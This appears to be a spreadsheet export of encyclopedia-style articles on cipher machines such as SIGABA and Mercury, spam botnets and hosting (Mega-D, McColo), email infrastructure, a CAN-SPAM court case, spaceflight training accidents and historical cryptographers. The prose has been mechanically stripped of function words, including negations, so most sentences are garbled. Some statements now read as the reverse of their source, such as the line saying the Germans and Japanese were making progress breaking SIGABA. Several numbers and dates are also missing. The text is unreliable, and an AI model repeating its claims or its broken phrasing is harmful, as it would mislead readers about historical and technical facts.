indicators date/time groups output tape. mode printed numbers. printing took place setting, digit keys active increment rotors. during encryption, connected space produced input alphabet maze. printed space decryption. reader expected understand word like “xebra” decrypted message actually “zebra.” printer automatically addled space group five characters encryption. sigaba zeroized index rotors read zero order digit alphabet code rotors letter each rotor caused rotor stop proper position zeroize process. sigaba’s rotors housed removable frame held place four thumb screws. this allowed sensitive elements machine stored secure safes quickly thrown overboard otherwise destroyed capture threatened. also allowed machine quickly switch networks used different rotor orders. messages character indicators, exterior indicator specified system used security classification interior indicator determined initial settings code alphabet rotors. list included separate index rotor settings security classification. this prevented lower classification messages used cribs attack higher classification messages. navy army different procedures interior indicator. both started zeroizing machine operator select random 5-character string message. this encrypted produce interior indicator. army lists included initial setting rotors used encrypt random string. navy operators used keyboard increment code rotors matched random character string. alphabet rotor would move process final position internal indicator. case joint operations, army procedures followed. lists included “26-30” check string. after rotors reordered according current key, operator would zeroize machine, encrypt characters encrypt “aaaaa”. ciphertext resulting five match check string. manual warned typographical errors possible lists four character match accepted. manual also gave suggestions generate random strings creating indicators. these included using playing cards poker chips, selecting characters cipher texts using sigaba random character generator. security although sigaba extremely secure, continued upgrade capability throughout war, fear axis cryptanalytic ability break sigaba's code. when german's enigma messages japan's type cipher machine broken, messages closely scrutinized signs axis forces able read cryptography codes. axis prisoners (pows) also interrogated goal finding evidence cryptography broken. however, germans japanese making progress breaking sigaba code. decrypted jn-a-20 message, dated january 1942, sent naval attaché berlin vice chief japanese naval general staff tokyo stated "joint jap[anese]-german cryptanalytical efforts" "highly satisfactory", since "german[s] exhibited commendable ingenuity recently experienced success english navy systems", "encountering difficulty establishing successful techniques attack 'enemy' code setup". another decrypted jn-a-20 message, germans admitted progress breaking communications unsatisfactory. japanese also admitted communications made real progress american cipher system. september 1944, allies advancing steadily western front, diary german signal intelligence group recorded: "u.s. 5-letter traffic: work discontinued unprofitable time".sigaba systems closely guarded times, separate safes system base code-wheel assembly, incident unit lost time. february 1945, truck carrying sigaba system three safes stolen guards visiting brothel recently-liberated colmar, france. general eisenhower ordered extensive search, finally discovered safes weeks later nearby river.: pp.510–512 interoperability allied counterparts need cooperation among us/british/canadian forces carrying joint military operations axis forces gave rise need cipher system could used allied forces. this functionality achieved three different ways. firstly, adapter (csp 1000), could retrofitted allied cipher machines, produced washington naval yard repair shop. total 3,500 adapters produced. second method adapt sigaba interoperation modified british machine, typex. common machine known combined cipher machine (ccm), used november 1943. because high cost production, ccms made. third common cost-effective. adapter manufactured teletype corporation chicago. total 4,500 adapters installed depot-level maintenance facilities. also mercury british machine also used rotors control rotors sigcum teleprinter encryption system used sigaba-style rotors references notes sourcesmark stamp, wing chan, "sigaba: cryptanalysis full keyspace", cryptologia july 2007, 201–2222 rowlett wrote book sigaba (aegean press, laguna hills, california). michael lee, "cryptanalysis sigaba", masters thesis, university california, santa barbara, june 2003 (pdf) (ps). john savard richard pekelney, "the mark design, history cryptology", cryptologia, 23(3), july 1999, pp211–228. crypto-operating instructions asam 1949, [1]. 1100(c), operating instructions mark (csp 888/889) mark (csp 1600), 1944, [2]. george lasry, practical meet-in-the-middle attack sigaba", international conference historical cryptology, histocrypt 2019 [3]. george lasry, "cracking sigaba less hours consumer pc", cryptologia, 2021 [4]. external links electronic cipher machine (ecm) mark rich pekelney sigaba simulator windows code book tool sigaba simulator (windows 2000-xp) mark also known sigaba, m-134-c, csp-889 john savard cryptanalysis sigaba, michael lee, university california santa barbara masters thesis, 2003 sigaba cipher machine beautiful idea practical meet-in-the-middle attack sigaba george lasry</t>
  </si>
  <si>
    <t>Mega-D botnet</t>
  </si>
  <si>
    <t>mega-d, also known alias ozdok, botnet peak responsible sending spam worldwide.on october 2008, federal trade commission, cooperation marshal software, tracked owners botnet froze assets.on november 2009, security company fireeye, inc. disabled mega-d botnet disabling command control structure. this akin srizbi botnet takedown late 2008. mega-d/ozdok takedown involved coordination dozens internet service providers, domain name registrars, non-profit organizations like shadowserver. security researchers estimated take immediate effect spam botnet. november 2009, spam stopped altogether, although small trickle weekend, directed couple small uk-based domains monitored.since botnet bounced back, exceeding pre-takedown levels nov. constituting worldwide spam dec. 13.in july 2010, researchers university california, berkeley published model mega-d's protocol state-machine, revealing internals proprietary protocol first time. protocol obtained automatic reverse engineering technique developed berkeley researchers. among contributions, research paper reveals flaw mega-d protocol allowing template milking, i.e., unauthorized spam template downloading. such flaw could used acquire spam templates train spam filters spam hits network. arrest november 2010, oleg nikolaenko arrested vegas, nevada federal bureau investigation charged violations can-spam 2003. nikolaenko eventually pleaded guilty operating mega-d botnet create "zombie network" many 500,000 infected computers. also storm botnet mpack malware e-mail spam internet crime internet security operation: roast mccolo srizbi botnet references</t>
  </si>
  <si>
    <t>Megalithic graffiti symbols</t>
  </si>
  <si>
    <t>megalithic markings, megalithic graffiti marks, megalithic symbols non-brahmi symbols markings found mostly potsherds found central india, south india lanka megalithic iron period. number scholars tried decipher symbols since 1878, currently consensus whether constitute undeciphered writing graffiti symbols without syllabic alphabetic meaning. history megalithic markings usually found burial sites also found habitation sites well. they tentatively dated 1000 marking transition proto-historic period historic period south asia. from archaeological stratigraphy, potsherds without symbols usually found lowest level, followed potsherds mixed symbols brahmi tamil-brahmi eventually highest level potsherds found brahmi tamil-brahmi etchings. from around disappear grave sites. relationship indus script 1960, archaeologist found surveyed megalithic symbols counterparts amongst indus script. concluded commonness culture indus valley civilisation later megalithic period. 2019, archaeologists tamil nadu excavated potsherds keeladi graffiti closely resembling symbols indus script. archaeological findings 1935 dish dating century bearing megalithic graffiti symbols discovered sulur, near coimbatore tamil nadu. 2001 publication, mahadevan argued inscription dish contained symbols similar indus script also symbols order comparable inscription tablet harappa. mahadevan suggested evidence languages inscriptions related.in february 2006, stone celt discovered sembiyankandiyur village, near mayiladuthurai, tamil nadu. celt dates early millennium bce, postdating harappan decline, bears markings mahadevan identified identical symbols indus script. argued evidence language used neolithic people south india also used late harappans.in 2007, tamil nadu state department archaeology (tnsda) found pots arrow-head symbols excavation melaperumpallam, village near puhar, mayiladuthurai. symbols reported striking resemblance seals unearthed mohenjo-daro, present-day pakistan, 1920s. also anaikoddai seal early indian epigraphy south indian inscriptions tamil inscriptions notes references sources</t>
  </si>
  <si>
    <t>Melaleuca, Inc. v. Hansen</t>
  </si>
  <si>
    <t>melaleuca, inc. hansen united states district court district idaho case clarified meaning "internet access provider" "direct adverse" effect used controlling assault non-solicited pornography marketing 2003, can-spam 2003, u.s.c. 103among several claims, melaleuca inc. claimed hansen violated "can-spam" emailing melaleuca executives trying induce leave company. hansen filed motion dismiss lack standing can-spam claims. court dismissed spam claims lack standing (law) can-spam 2003. background hansen independent marketing executive multi-level marketing company called itv. hansen's work tasks involved getting customers join marketing executives. hansen e-mailed melaleuca's marketing executives, informing inviting discover business opportunities. some individuals users "i-glide" email service. melaleuca owned domain name "i-glide.net", provided employees option purchasing internet services, including email. provided services third party internet service provider called applications. such, control access hardware enabled access i-glide customers, control spam filters applied emails. first district court decision (melaleuca court dismissed melaleuca's suit without prejudice, finding lack standing. standing can-spam 2003, plaintiff must "provider internet access service" "adversely affected" violations act. melaleuca can-spam section 7702 can-spam defines referencing u.s.c. 231, states: court found melaleuca fall definition "internet access provider" (ias), since play nominal role internet-related services. although melaleuca owned domain name provided e-mail addresses, provided internet access internet service provider, applications. although applications later assigned can-spam claims melaleuca, assignment untimely occurred lawsuit filed. melaleuca failed show direct adverse effect moreover, court held melaleuca show direct adverse effect damages hansen's emails. referencing gordon virtumundo, inc., ninth circuit case, court specified harm must real type experienced isps, something "beyond mere annoyance spam greater negligible burdens typically borne provider ordinary course business." court held melaleuca satisfied legal test congress intended providers. second district court decision (melaleuca melaleuca filed second suit. hansen moved dismiss, claiming second suit barred based issues preclusion. affirming prior decision issues, court granted motion dismiss. short, court re-affirmed melaleuca directly affected "internet access provider" can-spam 2003. significance this case similar gordon virtumundo, inc.. both cases define boundaries "internet access provider" used can-spam act. gordon, ninth circuit limited future causes action can-spam addressing standing thresholds can-spam act. court determined gordon bona fide internet access provider operate "authentic" internet service. providing email accounts alone enough, although providing email access email accounts sufficient qualify can-spam. moreover, court found gordon "adversely" suffered virtumundo's actions. instructs lower courts review standing can-spam claimants critical eye. external links court opinion adopting report recommendation gordon virtumundo, inc., f.3d 1040 (9th cir. 2009) docket report justia related links email spam computer crime references</t>
  </si>
  <si>
    <t>Melcom</t>
  </si>
  <si>
    <t>melcom supermarket chain consisting shops spread ghana. started 1989 indian magnate bhagwan khubchandani. late father, ramchand khubchandani, arrived gold coast 1929 14-year-old work store boy. melcom group companies family business. melcom group companies consists separate entities: melcom limited, century industries limited, crownstar electronic industries limited, melcom hospitality, melcom travels, melcom care. aside conquering extensive retail market share network retail outlets spread ghana (melcom limited), group well-diversified businesses.melcom group best known shopping mall, melcom limited. ghana’s largest chain retail department stores, melcom offers thousands products hundreds well known brands. history disasters 2012 2012 melcom suffered major accidents. november 2012, ghana suffered major accident melcom's five story shopping mall achimota near accra, ghana collapsed, trapping many people inside. nadmo organized rescue mission. people all, including dead, pulled rubble.melcom operating building, said rented, since january 2012. nadmo promised investigation find cause collapse. reports suggested building structural defects owing lack adherence building codes improper materials.on december 2012, melcom suffered another major accident mall agona swedru central region ghana totally burnt fire attended gnfrs. because fire occurred close work, casualties. however, adjoining warehouses stocked items christmas also burnt down. references</t>
  </si>
  <si>
    <t>Mercury (cipher machine)</t>
  </si>
  <si>
    <t>mercury british cipher machine used ministry 1950 least early 1960s. mercury online rotor machine descended typex, modified achieve longer cycle length using so-called double-drum basket system. history mercury designed wing commander smith rudd, awarded £2,250 £750 respectively 1960 work design machine. smith, developers typex, designed double-drum basket system 1943, initiative, fulfil need on-line system. mercury prototypes operational 1948, machine 1950. over mercury machines made 1959 £250,000 spent production. mercury links installed various overseas stations, including canada, australia, singapore, cyprus, germany, france, middle east, washington, nairobi colombo. machine used diplomatic messaging less decade, almost military use. 1960, anticipated machine would remain 1963, would made obsolete arrival (alvis) equipment. miniaturised version mercury designed, named ariel, machine appears adopted operational use. design mercury system, series rotors used. first series, dubbed control maze, four rotors, stepped cyclometrically typex. five outputs control maze used determine stepping five rotors second series rotors, message maze, latter used encrypt decrypt plaintext ciphertext. sixth rotor message maze controlled independently stepped opposite direction others. rotors interchangeable part either maze. using rotors control stepping rotors feature earlier cipher machine, mark mercury also used double-wired rotors, consisting "inside outside scrambled wheels", outer wheels settable number positions respect inner wheels. security mathematically determined typex sufficiently large cycle permit characters sent using single arrangement rotors without fear compromising security. counter recorded number keystrokes reached predetermined rotor manually advanced step, thus permitting typex safely encrypt messages strokes. mercury, longer cycle length, judged safe even 56700 characters passed setting rotors. this cycle length sufficient machine used on-line cipher machine traffic flow security machine would transmit continuously, even sending message. also 5-uco references "awards civilian personnel respect cypher machine development", 1955–1960, avia 65/977.</t>
  </si>
  <si>
    <t>Message authentication</t>
  </si>
  <si>
    <t>information security, message authentication data origin authentication property message modified transit (data integrity) receiving party verify source message. message authentication necessarily include property non-repudiation.message authentication typically achieved using message authentication codes (macs), authenticated encryption (ae) digital signatures. message authentication code, also known digital authenticator, used integrity check based secret shared parties authenticate information transmitted them. based using cryptographic hash symmetric encryption algorithm. authentication shared exactly parties (e.g. communicating devices), authentication fail existence third party possessing since algorithm longer able detect forgeries (i.e. able validate unique source message). addition, must also randomly generated avoid recovery brute-force searches related-key attacks designed identify messages transiting medium.some cryptographers distinguish "message authentication without secrecy" systems allow intended receiver verify source message, bother hiding plaintext contents message authenticated encryption systems. some cryptographers researched subliminal channel systems send messages appear "message authentication without secrecy" system, fact also transmit secret message. data origin authentication non-repudiation also studied framework quantum cryptography. also data integrity authentication deniable authentication references</t>
  </si>
  <si>
    <t>Message forgery</t>
  </si>
  <si>
    <t>cryptography, message forgery sending message deceive recipient real sender common example sending spam prank e-mail originated address really used. also authentication message authentication code stream cipher attack</t>
  </si>
  <si>
    <t>Message submission agent</t>
  </si>
  <si>
    <t>message submission agent (msa), mail submission agent, computer program software agent receives electronic mail messages mail user agent (mua) cooperates mail transfer agent (mta) delivery mail. uses esmtp, variant simple mail transfer protocol (smtp), specified 6409.many mtas perform function well, also programs specially designed msas without full functionality. historically, internet mail, functions port number official port msas 587. accepts user's incoming mail, accepts user's outgoing mail. benefits separation functions produces several benefits. benefit msa, since interacting directly author's mua, correct minor errors message's format (such missing date, message-id, fields, address missing domain name) and/or immediately report error author corrected sent recipients. accepting message another site cannot reliably make kinds corrections, error reports generated reach author all) message already sent. benefit dedicated port number, 587, always possible users connect domain submit mail. combat spam (including spam sent unwittingly victim botnet) many isps institutional networks restrict ability connect remote mtas port accessibility port enables nomadic users (for example, working laptop) continue send mail preferred submission servers even within others' networks. using specific submission server requirement sender policies signing practices enforced. another benefit separating functions makes easier deny relaying, refuse mail addressed recipient domain served locally. this strategy used isps prevent sending spam virus-infected client computers. contrast, must generally accept mail recipient internet, though accepts mail authors authorized established identity authentication. times mail submission acceptance incoming mail usually accomplished using protocol server, ability send mail arbitrary destinations without authentication allowed spammers mtas means distributing spam (since single message transaction request relay message large number recipients), also made difficult trace message origin. another benefit msas mtas different policies filtering spam. most msas require authentication form username password provided author. messages received therefore traceable author direct relationship msa, held accountable actions. this allows either spam filtering, permissive spam filtering exists purpose accepting incoming email domains. difficult establish trust mail sent arbitrary domains, generally direct relationship domains trust, even identity, established. absence trust, must generally rely heuristics third-party reputation services distinguish spam legitimate traffic, mechanisms history error-prone. separation therefore avoids unreliable spam recognition mechanisms mail submission, increases probability legitimate mail delivered successfully. protocol configuration while recent email clients port default, older ones still propose port users change port number manually latter case. also possible automatically discover server provides given domain, looking records domain. domain example.com publish record like _submission._tcp.example.com. mail.example.com. mandatory authentication 6409 requires clients authorized authenticated mail submission service, e.g., described smtp-auth (esmtpa), means radius, public certificates, (the mostly obsolete) smtp. policy enforcement must check submitted mail syntactically valid conforms relevant site policies. 6409 contains optional features: enforce submission rights guarantees envelope sender address valid authorized used authentication. this essence complies model specified 7208. sender permits sender address header field envelope sender address match author address "from" header field. this roughly complies sender model specified 4406 ignoring tricky case resent-from header fields covered 6409. also e-mail authentication list mail servers comparison mail servers smart host e-mail agent (infrastructure) (mxa) mail delivery agent (mda) mail user agent (mua) references klensin, (april 2001). simple mail transfer protocol. ietf. doi:10.17487/rfc2821. 2821. retrieved november 2013. "smtp secure". kasoft central. retrieved 2008-06-14.</t>
  </si>
  <si>
    <t>McColo</t>
  </si>
  <si>
    <t>mccolo us-based hosting service provider was, long time, source majority spam-sending activities entire world. late 2008, company shut upstream providers, global crossing hurricane electric, significant amount malware botnets trafficking mccolo servers. history mccolo formed 19-year-old russian hacker student named nikolai. nikolai's nickname "kolya mccolo"; hence name provider. malware traffic time termination upstream service november 2008, estimated mccolo customers responsible substantial proportion email spam flowing subsequent reports claim two-thirds greater reduction global spam volume. this reduction sustained period takedown. mccolo leading players so-called "bulletproof hosting" market isps allow servers remain online regardless complaints. according technica sources, upstream isps global crossing hurricane electric terminated service contacted brian krebs washington post’s security blog, multiple reports published organisations including secureworks, fireeye threatexpert, naming mccolo host much world's botnet traffic. according stewart, director malware research secureworks, mega-d, srizbi, pushdo, rustock warezov botnets hosted master servers mccolo; numerous complaints made mccolo simply moved offending servers sites different subnets. spamhaus.org reportedly finds roughly million computers infected either srizbi rustock sending spam average week. following shut down, details began emerge isp's clients, included distributors vendors child pornography criminal enterprises, including russian business network.mccolo gained reconnection briefly november 2008 backup connection agreement common industry, rapidly shut again.the mccolo takedown especially affected srizbi, world's largest botnets, controlling 500,000 infected nodes november 2008.symantec's monthly state spam report april 2009 stated spamming back mccolo taken offline. botnets created ones brought back online, estimated percent email traffic spam. november 2009 space used mccolo still largely unused, much unattractive buyers widely blacklisted. also botnet oleg nikolaenko, whose arrest also reduced worldwide spam rustock botnet, largest spambots ever built zombie (computer science) external links washington post "security fix" blog references</t>
  </si>
  <si>
    <t>Mixmaster anonymous remailer</t>
  </si>
  <si>
    <t>mixmaster type anonymous remailer sends messages fixed-size packets reorders them, preventing anyone watching messages remailers tracing them. implementation chaumian network. history mixmaster originally written lance cottrell, maintained sassaman. peter palfrader current maintainer. current mixmaster software compiled handle cypherpunk messages well; needed reply blocks servers. also anonymity anonymous anonymous remailer cypherpunk anonymous remailer (type mixminion (type iii) onion routing (network) pseudonymous remailer (a.k.a. servers) penet remailer data privacy traffic analysis references further reading email security, bruce schneier (isbn 0-471-05318-x) computer privacy handbook, andre bacard (isbn 1-56609-171-3) external links mixmaster homepage official mixmaster remailer remailer remailer vulnerabilities a/i: paranoia remailer howto feraga.com: howto type anonymous remailer (link active 2010)</t>
  </si>
  <si>
    <t>List of spaceflight non-fatal training accidents</t>
  </si>
  <si>
    <t>spaceflight-related accidents incidents assembly, testing, preparation flight crewed uncrewed spacecraft occasionally resulted injuries loss craft since earliest days space programs. 1960–1969 three five lunar landing research training vehicles (llrv lltv) destroyed crashes near houston, texas: 1968 llrv crashed ellington afb, texas, caused loss helium pressure controlled steering jets. neil armstrong ejected safely. 1968 december lltv crashed ellington afb, texas, caused failure fly-by-wire control system. test pilot joseph algranti ejected safely. 1971 january lltv crashed ellington afb, texas, caused failure fly-by-wire control system. nasa test pilot stuart present ejected safely. 1960 july injured centrifuge training soviet cosmonaut anatoly yakovlevich kartashov suffered pinpoint hemorrhages spine centrifuge training. injuries grounded medical staff retired cosmonaut group april 1962 1961 august parachute training accident, broken left foot cosmonaut pavel belyayev broke left foot parachute jump related cosmonaut training. result, cosmonaut training august 1962. 1961 t-33 engine failure, emergency landing astronauts grissom alan shepard experienced broken rotor blade engine t-33 flying training mission lake erie. grissom made emergency landing selfridge force base near detroit, both astronauts astronauts left later. 1962 experimental paraglider, hard landing astronaut grissom piloting experimental paraglider edwards force base, towed aloft another aircraft released. paraglider made hard landing crumpled nose wheel. craft remained upright grissom walked away unhurt. craft part experiments lead landing gemini spacecraft using similar paraglider wing land. 1963 march f-102 jet, paved runway astronaut elliot piloting nasa f-102 fighter used maintain astronaut pilot proficiency paved runway landing ellington near houston, officials said astronaut landed plane fast unable stop paved portion runway. astronaut injured aircraft damaged flown later another astronaut. 1964 simulated moon walk spacesuit, fall steep, rocky lava astronaut walter cunningham wearing full spacesuit 13.5 backpack. simulating moon walk rocky lava near bend, oregon. while climbing 15-meter, degree slope, meters fell backward. first, observers thought might roll bottom slope, cunningham spread slow motion nearby engineer also provided assistance. cunningham uninjured, slight pressure loss suit glove puncture. 1964 t-38 jet, runway, landing gear damaged astronauts charles "pete" conrad james lovell landing ellington near houston, rainstorm, flight washington, they returning funeral astronaut theodore freeman. they unable stop aircraft runway. aircraft runway muddy, grassy area damaging landing gear. astronauts injured mishap. 1966 altitude chamber, oxygen valve explosion, fire astronaut edward givens testing gemini astronaut maneuvering unit (amu) wearing spacesuit altitude chamber manned spacecraft center (johnson space center), houston, while altitude chamber, oxygen valve exploded outside altitude chamber burning four technicians sending hospital. technicians' clothes fire three technicians suffered minor burns extinguishing burning clothing. astronaut givens injured incident. 1966 january zero training, dislocated shoulder requiring surgery astronaut donn eisele underwent surgical repair left shoulder dislocation received zero flight training 1965. shoulder reinjured physical training manned spacecraft (johnson space) center later year. 1966 july t-38 takeoff abort, runway astronauts edward white russell schweickart experienced engine failure takeoff paso international airport, t-38 aircraft. takeoff aborted aircraft runway, suffering nose gear collapse blowouts main landing gear tires. astronauts flying houston, angeles, stop paso refuel. both astronauts uninjured continued journey commercial airliner. 1966 october parachute training accident, broken foot cosmonaut georgi grechko broke foot parachute jump related training soyuz manned lunar flyby missions. injury forced training lunar flyby missions. 1968 parachute training, fracture astronaut robert parker suffered fractured coccyx (the final bone spine), taking part parachute training. injury occurred williams force base, arizona. injury thought serious. 1968 september physical training, fractured collar bone astronaut karl henize suffered fractured collar bone physical development class part astronaut training. placed non-flying status five weeks. 1969 rope training accident, serious injury cosmonaut vladimir kovalyonok suffered serious injury rope training (climbing?) cosmonaut training. recovered able continue cosmonaut training graduated august 1969. 1969 helicopter landing accident during nasa astronaut helicopter flight training, astronaut edward gibson, flying solo, landed helicopter flat, near laporte, helicopter sank mud, flipped spinning rotor blades tore craft apart. gibson uninjured. 1969 t-33 crash landing astronaut joseph kerwin made belly landing foam covered runway t-33 trainer ellington near houston, texas landing gear problem. survived crash landing uninjured. 1970–1979 1971 january helicopter crash: eugene cernan flying bell helicopter part lunar module training backup commander apollo helicopter crashed indian river cape canaveral, florida. cernan nearly drowned wearing life vest received second-degree burns face singed hair. according official reports time, crash result mechanical failure. later accounts, written cernan autobiography, admit flying showing nearby boaters. helicopter dipped skid water crashed. james mcdivitt, apollo manager time, demanded cernan removed flight status given command apollo cernan defended deke slayton given apollo command. james mcdivitt resigned apollo manager shortly apollo mission. 1971 t-38 jet, rear cockpit canopy lost, takeoff aborted astronaut richard truly taking kellogg field, battle creek, nasa t-38 jet. during takeoff roll, rear cockpit canopy flew aircraft. astronaut truly aborted takeoff injured. aircraft suffered minor damage. 1972 t-38 jet, electrical malfunction, fuel, ejected astronaut charles "pete" conrad ejected safely nasa t-38 near bergstrom afb, austin, landed meters base operations building. electrical malfunction caused loss instruments severe weather listed review board major factor accident. conrad flight dover, dobbins afb, ellington afb, houston, weather, diverted first hobby airport, houston ellington minimums landing. while final approach hobby airport, darkness, heavy rain lightning, t-38 generator failed, causing loss cockpit lighting partial loss navigation instruments. conrad broke approach tried climb weather. generator brought back online along cockpit lighting. because electrical problems, requested diversion airport visual flight rules. controllers sent toward randolph afb, antonio, soon became apparent t-38 enough fuel reach randolph afb. controllers diverted bergstrom afb. t-38 fuel reached bergstron afb. conrad ejected 1100 meters. aircraft destroyed. taken base hospital routine examination returned houston later night. 1974 t-38 jet, landing mishap, gear collapse astronaut karl henize involved "landing mishap" t-38 aircraft landing bergstrom near austin, visibility conditions. instrument flight ellington near houston, landing gear t-38 collapsed aircraft damaged. henize injured. 1979 october altitude chamber accident, electrical burns, brain concussion cosmonaut alexander viktorenko conducting tests altitude chamber part cosmonaut training. errors person operating altitude chamber, viktorenko struck electric current, causing burns, fall brain concussion. unconscious hours. result injuries recovery, complete cosmonaut training february 1982. 1980–1989 1982 t-38 struck lightning, damaged astronaut gordon fullerton piloting solo flight nasa t-38 aircraft houston, texas cleveland, ohio make speaking engagement. while final approach cleveland's hopkins airport, aircraft struck lightning. fullerton landed safely post-landing inspection showed 2-foot 6-foot section torn tail aircraft. astronaut later commented, felt like howitzer cockpit. strong lightning (bolt) i've ever experienced.". 1982 t-38 landing accident, runway astronaut thomas mattingly injured t-38 aircraft runway ellington near houston, texas. aircraft ended feet runway landing heavy rain. there substantial damage wings, nose landing gear aircraft incident. 1984 t-38 jet, struck birds, engine flameout, aborted takeoff astronaut james hoften taking t-38 space shuttle runway training flight. this training sts-41-c mission challenger launched next day. runway, going km/h (162 mph), struck flock birds, causing right engine flame out. applied brakes safely aborted takeoff without aircraft damage. bird remains later found nose landing gear aircraft engine needed removed inspected damage. 1987 t-38 engine failure, fire, emergency landing astronaut brewster shaw nasa pilot robert rivers experienced engine failure fire t-38 aircraft. approach alamitos army field, right engine failed caught fire. there smoke cockpit. crew chose land plane rather bail populated area. they landed successfully climbed burning jet. experienced substantial damage. crew taken long beach naval hospital observation later released. 1989 t-38 jet, near midair collision airliner astronaut david walker flying nasa t-38 dulles airport near washington, d.c. presidential ceremony. airport altitude 2100 meters, came within meters colliding airbus airliner. later found fault incident suspended flying days nasa. also removed commander sts-44 mission. 1990–1999 1993 emergency egress training, broken bones foot astronaut rhea seddon broke four metatarsal bones left foot emergency egress training johnson space center orbiter training facility. using inflatable slide similar used airliners landing emergency evacuations. while sliding slide, left foot became pinned her, breaking four minor bones. returned full-time training weeks. 1993 frostbitten fingers thermal vacuum chamber while training thermal vacuum chamber sts-61 hubble repair mission, astronaut story musgrave suffered frostbite fingertips right hand. working spacesuit chamber hours temperatures. fingertips blackened numb incident. surgery required sufficiently healed time repair mission december 1993. 1993 medical experiment, heart breathing stopped astronaut bonnie dunbar suffered allergic reaction experimental drug collapsed medical tests johnson space center, texas. breathing heart stopped rushed local hospital. recovered later declared good health. experiment involved injecting drug measure effect weightlessness fluids body. 2000–2009 2000 sprained ankle delays shuttle launch astronaut commander sts-101 mission, james halsell sprained ankle climbing steps inside space shuttle simulator johnson space center, houston. this caused miss training activities delayed launch mission week. 2003 nasa gulfstream shuttle training aircraft engine thrust reverser fell aircraft flight nasa gulfstream shuttle training aircraft (sta) flying series simulated shuttle landings kennedy space center shuttle landing facility. board aircraft unidentified nasa astronaut pilot training personnel. aircraft final approach 13,000 feet on-board instruments indicated malfunction engine thrust reversers. aircraft landed safely. post-landing inspection showed 585-pound, 4-foot-wide, 5-foot-long thrust reversers fallen aircraft. divers later found thrust reverser bottom nearby banana river. investigation showed bolt failed, causing part fall aircraft. 2003 spaceshipone landing accident, runway while piloting spaceshipone first powered test flight, 11p, astronaut brian binnie reached peak altitude 20.7 exceeded speed sound. upon landing, spaceshipone experienced roll oscillation caused left main gear collapse. craft runway rolled stop soft sand. craft sustained minor damage, later repaired, pilot uninjured. 2010–2019 2020 also list spaceflight-related accidents incidents references</t>
  </si>
  <si>
    <t>List of cryptographers</t>
  </si>
  <si>
    <t>this list cryptographers. cryptography practice study techniques secure communication presence third parties called adversaries. twentieth century al-khalil ahmad al-farahidi: wrote (now lost) book cryptography titled "book cryptographic messages". al-kindi, century arabic polymath originator frequency analysis. athanasius kircher, attempts decipher crypted messages augustus younger, duke brunswick-lüneburg, wrote standard book cryptography wahshiyya: published several cipher alphabets used encrypt magic formulas. john dee, wrote occult book, fact cover crypted text 'adlan: 13th-century cryptographer made important contributions sample size frequency analysis. duke mantua francesco gonzaga used earliest example homophonic substitution cipher early 1400s. al-durayhim: gave detailed descriptions eight cipher systems discussed substitution ciphers, leading earliest suggestion "tableau" kind centuries later became known "vigenère table". ahmad al-qalqashandi: author subh al-a 'sha, fourteen volume encyclopedia arabic, included section cryptology. list ciphers work included substitution transposition, first time, cipher multiple substitutions plaintext letter. charles babbage, 19th century mathematician who, time crimean war, secretly developed effective attack polyalphabetic substitution ciphers. leone battista alberti, polymath/universal genius, inventor polyalphabetic substitution (more specifically, alberti cipher), first mechanical encryption aid. giovanni battista della porta, author seminal work cryptanalysis. étienne bazeries, french, military, considered greatest natural cryptanalysts. best known developing "bazeries cylinder" influential 1901 text chiffres secrets dévoilés ("secret ciphers unveiled"). giovan battista bellaso, italian cryptologist giovanni fontana (engineer), wrote encrypted books hildegard bingen used alphabet write letters. julius caesar, roman general/politician, caesar cipher named him, lost work cryptography probus (probably valerius probus) claimed covered military cryptography detail. likely invent cipher named him, substitution ciphers well time. friedrich kasiski, author first published attack vigenère cipher, known kasiski test. auguste kerckhoffs, known contributing cipher design principles. edgar allan poe, author book, words secret writing, essay cryptanalysis, gold bug, short story featuring letter frequencies solution cryptogram. johannes trithemius, mystic first describe tableaux (tables) polyalphabetic substitution. wrote early work steganography cryptography generally. philips marnix, lord sint-aldegonde, deciphered spanish messages william silent dutch revolt spanish. john wallis codebreaker cromwell charles charles wheatstone, inventor so-called playfair cipher general polymath. world world wartime cryptographers arne beurling, swedish mathematician cryptograph. lambros callimahos, nsa, worked william friedman, taught cryptanalysts. caracristi, sis, solved japanese army codes world later became deputy director national security agency. alec naylor dakin, bletchley park world ludomir danilewicz, poland, biuro szyfrow, helped construct enigma machine copies break ciphers. alastair denniston, director gc&amp;cs bletchley park 1919 1942. agnes meyer driscoll, broke several japanese ciphers. genevieve grotjan feinstein, sis, noticed pattern breaking purple. elizebeth smith friedman, coast guard treasury department cryptographer, co-invented modern cryptography. william friedman, sis, introduced statistical methods cryptography. cecilia elspeth giles, bletchley park jack good gc&amp;cs, bletchley park worked alan turing statistical approach cryptanalysis. nigel grey, room played important role decryption zimmermann telegram world dillwyn knox, room gc&amp;cs, broke commercial enigma cipher used abwehr (german military intelligence). solomon kullback sis, helped break japanese cipher, later chief scientist national security agency. frank lewis worked william friedman, puzzle master william hamilton martin bernon mitchell, u.s. national security agency cryptologists defected soviet union 1960 marks cryptography director, author playwright. donald michie gc&amp;cs, bletchley park worked cryptanalysis lorenz cipher colossus computer. newman, gc&amp;cs, bletchley park headed section developed colossus computer cryptanalysis lorenz cipher. georges painvin french, broke adfgvx cipher first world war. marian rejewski, poland, biuro szyfrów, polish mathematician cryptologist who, 1932, solved enigma machine plugboard, main cipher device germany. john joseph rochefort made major contributions break jn-25 attack pearl harbor. rosen sis, deduced japanese purple machine built stepping switches. frank rowlett sis, leader team broke purple. jerzy różycki, poland, biuro szyfrów, helped break german enigma ciphers. luigi sacco, italy, italian general author manual cryptography. laurance safford chief cryptographer navy decades+, including world abraham sinkov sis. john tiltman brigadier, room gc&amp;cs, bletchley park, gchq, nsa. extraordinary length range cryptographic service alan mathison turing gc&amp;cs, bletchley park chief cryptographer, inventor bombe used decrypting enigma, mathematician, logician, renowned pioneer computer science. william thomas tutte gc&amp;cs, bletchley park, john tiltman, broke lorenz 40/42 encryption machine (codenamed tunny) leading development colossus computer. william stone weedon, gordon welchman gc&amp;cs, bletchley park head (german army force enigma cipher. decryption), made important contribution design bombe. herbert yardley (us), author "the american black chamber", worked china cryptographer briefly canada. henryk zygalski, poland, biuro szyfrów, helped break german enigma ciphers. karl stein german, head division (security processes) cipher department high command wehrmacht. discoverer stein manifold. gisbert hasenjaeger german, tester enigma. discovered proof completeness theorem kurt gödel predicate logic. heinrich scholz german, worked division okw. logician friend alan turning. gottfried köthe german, cryptanalyst okw. mathematician created theory topological vector spaces. ernst witt german, mathematician okw. mathematical discoveries named after ernst witt. helmut grunsky german, worked complex analysis geometric function theory. introduced grunsky's theorem grunsky inequalities. georg hamel. oswald teichmüller german, temporarily employed cryptanalyst. introduced quasiconformal mappings differential geometric methods complex analysis. 